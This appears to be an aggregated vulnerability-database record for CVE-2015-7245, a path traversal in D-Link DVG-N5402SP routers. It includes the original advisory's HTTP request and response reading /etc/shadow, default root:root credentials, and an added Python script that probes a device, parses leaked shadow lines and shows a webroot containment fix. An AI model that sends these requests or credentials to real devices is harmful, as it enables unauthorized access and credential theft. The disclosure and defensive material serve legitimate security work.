ID

VAR-201704-0218


CVE

CVE-2015-7245


TITLE

D-Link DVG-N5402SP Directory traversal vulnerability in some firmware

Trust: 0.8

sources: JVNDB: JVNDB-2015-007543

DESCRIPTION

Directory traversal vulnerability in D-Link DVG-N5402SP with firmware W1000CN-00, W1000CN-03, or W2000EN-00 allows remote attackers to read sensitive information via a .. (dot dot) in the errorpage parameter. The D-Link DVG-N5402SP is a wireless router product from D-Link for voice, fax and shared wireless Internet over IP networks. An attacker could exploit this vulnerability to read arbitrary files. D-Link DVG-N5402SP is prone to multiple security vulnerabilities. Attackers can leverage these issues to bypass the authentication mechanism and gain access to the vulnerable device, use directory-traversal characters ('../') and obtain sensitive information; other attacks are also possible.

D-Link DVG-N5402SP File Path Traversal, Weak Credentials Management, and Sensitive Info Leakage Vulnerabilities

*Timelines*
Reported to CERT + Vendor: August 2015
D-Link released beta release: Oct 23, 2015
New fix release: MD5 (GRNV6.1U23J-83-DL-R1B114-SG_Normal.EN.img) = 04fd8b901e9f297a4cdbea803a9a43cb
No public disclosure till date - D-Link waiting for Service providers to ask for new release + CERT opted out

*Vulnerable Models, Firmware, Hardware versions*
DVG-N5402SP Web Management
Model Name : GPN2.4P21-C-CN
Firmware Version : W1000CN-00
Firmware Version : W1000CN-03
Firmware Version : W2000EN-00
Hardware Platform : ZS
Hardware Version : Gpn2.4P21-C_WIFI-V0.05

Device can be managed through three users:
1. super - full privileges
2. admin - full privileges
3. support - restricted user

*1.*
*CVE-ID*: CVE-2015-7245

*HTTP Request*
POST /cgi-bin/webproc HTTP/1.1
Host: <IP>:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://<IP>:8080/cgi-bin/webproc
Cookie: sessionid=abcdefgh; language=en_us; sys_UserName=super
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 223

getpage=html%2Findex.html&*errorpage*=../../../../../../../../../../../etc/shadow&var%3Amenu=setup&var%3Apage=connected&var% &obj-action=auth&%3Ausername=blah&%3Apassword=blah&%3Aaction=login&%3Asessionid=abcdefgh

*HTTP Response*
HTTP/1.0 200 OK
pstVal->name:getpage; pstVal->value:html/main.html
pstVal->name:getpage; pstVal->value:html/index.html
pstVal->name:errorpage; pstVal->value:../../../../../../../../../../../etc/shadow
pstVal->name:var:menu; pstVal->value:setup
pstVal->name:var:page; pstVal->value:connected
pstVal->name:var:subpage; pstVal->value:-
pstVal->name:obj-action; pstVal->value:auth
pstVal->name::username; pstVal->value:super
pstVal->name::password; pstVal->value:super
pstVal->name::action; pstVal->value:login
pstVal->name::sessionid; pstVal->value:1ac5da6b
Connection: close
Content-type: text/html
Pragma: no-cache
Cache-Control: no-cache
set-cookie: sessionid=1ac5da6b; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/

#root:<hash_redacted>:13796:0:99999:7:::
root:<hash_redacted>:13796:0:99999:7:::
#tw:<hash_redacted>:13796:0:99999:7:::
#tw:<hash_redacted>:13796:0:99999:7:::

*2. Use of Default, Hard-Coded Credentials*
*CVE-ID*: CVE-2015-7246
The device has two system user accounts configured with default passwords (root:root, tw:tw). Login - tw - is not active though.
Anyone could use the default password to gain administrative control through the Telnet service of the system (when enabled), leading to loss of integrity, confidentiality, or availability.

*3. Sensitive info leakage via device running configuration backup*
*CVE-ID*: CVE-2015-7247
Usernames, passwords, keys, values and web account hashes (super & admin) are stored in clear-text and not masked. It is noted that the restricted 'support' user may also access this config backup file from the portal directly, gather clear-text admin creds, and gain full, unauthorized access to the device.

--
Best Regards,
Karn Ganeshen
ipositivesecurity.blogspot.in
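The following Python script is an added example and is not part of the advisory or of D-Link's firmware. It rebuilds the errorpage POST body from the request above, scans a webproc response for /etc/shadow-style records in the shape the response above shows, and adds the webroot containment check that the vulnerable handler evidently does not perform. The host, port, path, parameter names and cookie values are the ones from the advisory; SAMPLE_RESPONSE is constructed from the response shown (hashes redacted, headers trimmed); the safe_page_path helper and its /www webroot are assumptions for illustration, not D-Link's code.

```python
"""Added example for CVE-2015-7245 (not from the advisory or from D-Link):
rebuild the traversal request, scan a webproc response for leaked /etc/shadow
records, and show the webroot containment check the handler lacks."""
import posixpath
import re
import urllib.request
from urllib.parse import urlencode

# Constructed sample response, modelled on the one in the advisory
# (parameter echo lines, then the leaked shadow file with hashes redacted).
SAMPLE_RESPONSE = (
    "pstVal->name:getpage; pstVal->value:html/index.html\n"
    "pstVal->name:errorpage; pstVal->value:../../../../../../../../../../../etc/shadow\n"
    "pstVal->name:obj-action; pstVal->value:auth\n"
    "Connection: close\n"
    "Content-type: text/html\n"
    "set-cookie: sessionid=1ac5da6b; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/\n"
    "\n"
    "#root:<hash_redacted>:13796:0:99999:7:::\n"
    "root:<hash_redacted>:13796:0:99999:7:::\n"
    "#tw:<hash_redacted>:13796:0:99999:7:::\n"
    "#tw:<hash_redacted>:13796:0:99999:7:::\n"
)

# One /etc/shadow record: optional leading '#', user, hash, then the numeric
# ageing fields. Header lines and the pstVal echo lines do not fit this shape.
SHADOW_LINE = re.compile(
    r"^(#?)([a-z_][a-z0-9_-]*):([^:\n]*):(\d*):(\d*):(\d*):(\d*):[^\n]*$", re.M
)


def build_traversal_body(target="etc/shadow", depth=11, session="abcdefgh"):
    """Reproduce the POST body from the advisory with `target` in errorpage.
    Parameter names are the device's; extra '../' beyond '/' are harmless."""
    params = [
        ("getpage", "html/index.html"),
        ("errorpage", "../" * depth + target),
        ("var:menu", "setup"),
        ("var:page", "connected"),
        ("obj-action", "auth"),
        (":username", "blah"),
        (":password", "blah"),
        (":action", "login"),
        (":sessionid", session),
    ]
    return urlencode(params)


def detect_shadow_leak(body):
    """Return (users, active): every account name found in shadow-format lines
    and the subset whose line is not commented out (a usable credential line)."""
    users, active = [], []
    for m in SHADOW_LINE.finditer(body):
        commented, user = m.group(1), m.group(2)
        if user not in users:
            users.append(user)
        if not commented and user not in active:
            active.append(user)
    return users, active


def probe(host, port=8080, timeout=10):
    """Send the advisory's request to a device you are authorised to test.
    The cookie values are the ones shown in the advisory (no valid login)."""
    req = urllib.request.Request(
        f"http://{host}:{port}/cgi-bin/webproc",
        data=build_traversal_body().encode(),
        headers={
            "Content-Type": "application/x-www-form-urlencoded",
            "Cookie": "sessionid=abcdefgh; language=en_us; sys_UserName=super",
        },
    )
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return detect_shadow_leak(resp.read().decode("latin-1", "replace"))


def safe_page_path(webroot, requested):
    """Hardened handling (assumed fix, not D-Link's code): resolve `requested`
    under `webroot` and refuse anything that escapes it, is absolute, or
    carries a NUL byte. Returns the path to serve, or None to reject."""
    if not requested or "\x00" in requested or requested.startswith("/"):
        return None
    root = posixpath.normpath(webroot)
    full = posixpath.normpath(posixpath.join(root, requested))
    if not full.startswith(root + "/"):
        return None
    return full


if __name__ == "__main__":
    print(build_traversal_body())
    print(detect_shadow_leak(SAMPLE_RESPONSE))  # (['root', 'tw'], ['root'])
    print(safe_page_path("/www", "../" * 11 + "etc/shadow"))  # None
```

Run against the constructed sample, detect_shadow_leak reports root and tw with only root uncommented, which is exactly the condition that turns the leak into a usable Telnet credential line under CVE-2015-7246. The containment check normalises before comparing, so a payload such as html/../../etc/shadow is rejected even though it does not start with dot-dot, while html/../index.html still resolves inside the webroot.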

Trust: 2.7

sources: NVD: CVE-2015-7245 // JVNDB: JVNDB-2015-007543 // CNVD: CNVD-2016-01164 // BID: 82754 // VULHUB: VHN-85206 // VULMON: CVE-2015-7245 // PACKETSTORM: 135590

IOT TAXONOMY

category:['IoT', 'Network device']sub_category: -

Trust: 0.6

sources: CNVD: CNVD-2016-01164

AFFECTED PRODUCTS

vendor:d linkmodel:dvg-n5402spscope:eqversion:w1000cn-00

Trust: 2.4

vendor:d linkmodel:dvg-n5402spscope:eqversion:w1000cn-03

Trust: 2.4

vendor:d linkmodel:dvg-n5402spscope:eqversion:w2000en-00

Trust: 2.4

vendor:d linkmodel:dvg-n5402spscope: - version: -

Trust: 0.6

sources: CNVD: CNVD-2016-01164 // JVNDB: JVNDB-2015-007543 // CNNVD: CNNVD-201602-370 // NVD: CVE-2015-7245

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2015-7245
value: HIGH

Trust: 1.0

NVD: CVE-2015-7245
value: HIGH

Trust: 0.8

CNVD: CNVD-2016-01164
value: MEDIUM

Trust: 0.6

CNNVD: CNNVD-201602-370
value: HIGH

Trust: 0.6

VULHUB: VHN-85206
value: MEDIUM

Trust: 0.1

VULMON: CVE-2015-7245
value: MEDIUM

Trust: 0.1

nvd@nist.gov: CVE-2015-7245
severity: MEDIUM
baseScore: 5.0
vectorString: AV:N/AC:L/AU:N/C:P/I:N/A:N
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: PARTIAL
integrityImpact: NONE
availabilityImpact: NONE
exploitabilityScore: 10.0
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.9

CNVD: CNVD-2016-01164
severity: MEDIUM
baseScore: 4.3
vectorString: AV:N/AC:M/AU:N/C:P/I:N/A:N
accessVector: NETWORK
accessComplexity: MEDIUM
authentication: NONE
confidentialityImpact: PARTIAL
integrityImpact: NONE
availabilityImpact: NONE
exploitabilityScore: 8.6
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.6

VULHUB: VHN-85206
severity: MEDIUM
baseScore: 5.0
vectorString: AV:N/AC:L/AU:N/C:P/I:N/A:N
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: PARTIAL
integrityImpact: NONE
availabilityImpact: NONE
exploitabilityScore: 10.0
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.1

nvd@nist.gov: CVE-2015-7245
baseSeverity: HIGH
baseScore: 7.5
vectorString: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
attackVector: NETWORK
attackComplexity: LOW
privilegesRequired: NONE
userInteraction: NONE
scope: UNCHANGED
confidentialityImpact: HIGH
integrityImpact: NONE
availabilityImpact: NONE
exploitabilityScore: 3.9
impactScore: 3.6
version: 3.0

Trust: 1.8

sources: CNVD: CNVD-2016-01164 // VULHUB: VHN-85206 // VULMON: CVE-2015-7245 // JVNDB: JVNDB-2015-007543 // CNNVD: CNNVD-201602-370 // NVD: CVE-2015-7245

PROBLEMTYPE DATA

problemtype:CWE-22

Trust: 1.9

sources: VULHUB: VHN-85206 // JVNDB: JVNDB-2015-007543 // NVD: CVE-2015-7245

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-201602-370

TYPE

path traversal

Trust: 0.6

sources: CNNVD: CNNVD-201602-370

CONFIGURATIONS

sources: JVNDB: JVNDB-2015-007543

EXPLOIT AVAILABILITY

sources: VULHUB: VHN-85206 // VULMON: CVE-2015-7245

PATCH

title:Top Pageurl:http://www.dlink.com/uk/en

Trust: 0.8

title:Kenzer Templates [5170] [DEPRECATED]url:https://github.com/ARPSyndicate/kenzer-templates

Trust: 0.1

sources: VULMON: CVE-2015-7245 // JVNDB: JVNDB-2015-007543

EXTERNAL IDS

db:NVDid:CVE-2015-7245

Trust: 3.6

db:PACKETSTORMid:135590

Trust: 2.7

db:EXPLOIT-DBid:39409

Trust: 1.8

db:BIDid:82754

Trust: 0.9

db:JVNDBid:JVNDB-2015-007543

Trust: 0.8

db:CNNVDid:CNNVD-201602-370

Trust: 0.7

db:CNVDid:CNVD-2016-01164

Trust: 0.6

db:VULHUBid:VHN-85206

Trust: 0.1

db:VULMONid:CVE-2015-7245

Trust: 0.1

sources: CNVD: CNVD-2016-01164 // VULHUB: VHN-85206 // VULMON: CVE-2015-7245 // BID: 82754 // JVNDB: JVNDB-2015-007543 // PACKETSTORM: 135590 // CNNVD: CNNVD-201602-370 // NVD: CVE-2015-7245

REFERENCES

url:http://packetstormsecurity.com/files/135590/d-link-dvg-n5402sp-path-traversal-information-disclosure.html

Trust: 2.7

url:http://seclists.org/fulldisclosure/2016/feb/24

Trust: 2.1

url:https://www.exploit-db.com/exploits/39409/

Trust: 1.9

url:https://nvd.nist.gov/vuln/detail/cve-2015-7245

Trust: 0.9

url:http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7245

Trust: 0.8

url:http://www.securityfocus.com/bid/82754

Trust: 0.6

url:http://www.dlink.co.in/

Trust: 0.3

url:https://cwe.mitre.org/data/definitions/22.html

Trust: 0.1

url:https://nvd.nist.gov

Trust: 0.1

url:https://github.com/arpsyndicate/kenzer-templates

Trust: 0.1

url:http://<ip>:8080/cgi-bin/webproc

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2015-7247

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2015-7246

Trust: 0.1

sources: CNVD: CNVD-2016-01164 // VULHUB: VHN-85206 // VULMON: CVE-2015-7245 // BID: 82754 // JVNDB: JVNDB-2015-007543 // PACKETSTORM: 135590 // CNNVD: CNNVD-201602-370 // NVD: CVE-2015-7245

CREDITS

Karn Ganeshen

Trust: 1.0

sources: BID: 82754 // PACKETSTORM: 135590 // CNNVD: CNNVD-201602-370

SOURCES

db:CNVDid:CNVD-2016-01164
db:VULHUBid:VHN-85206
db:VULMONid:CVE-2015-7245
db:BIDid:82754
db:JVNDBid:JVNDB-2015-007543
db:PACKETSTORMid:135590
db:CNNVDid:CNNVD-201602-370
db:NVDid:CVE-2015-7245

LAST UPDATE DATE

2025-04-20T23:13:14.258000+00:00


SOURCES UPDATE DATE

db:CNVDid:CNVD-2016-01164date:2016-02-22T00:00:00
db:VULHUBid:VHN-85206date:2017-04-28T00:00:00
db:VULMONid:CVE-2015-7245date:2023-04-26T00:00:00
db:BIDid:82754date:2016-07-05T21:22:00
db:JVNDBid:JVNDB-2015-007543date:2017-05-26T00:00:00
db:CNNVDid:CNNVD-201602-370date:2023-04-27T00:00:00
db:NVDid:CVE-2015-7245date:2025-04-20T01:37:25.860

SOURCES RELEASE DATE

db:CNVDid:CNVD-2016-01164date:2016-02-22T00:00:00
db:VULHUBid:VHN-85206date:2017-04-24T00:00:00
db:VULMONid:CVE-2015-7245date:2017-04-24T00:00:00
db:BIDid:82754date:2016-02-03T00:00:00
db:JVNDBid:JVNDB-2015-007543date:2017-05-26T00:00:00
db:PACKETSTORMid:135590date:2016-02-03T20:32:22
db:CNNVDid:CNNVD-201602-370date:2016-02-19T00:00:00
db:NVDid:CVE-2015-7245date:2017-04-24T18:59:00.163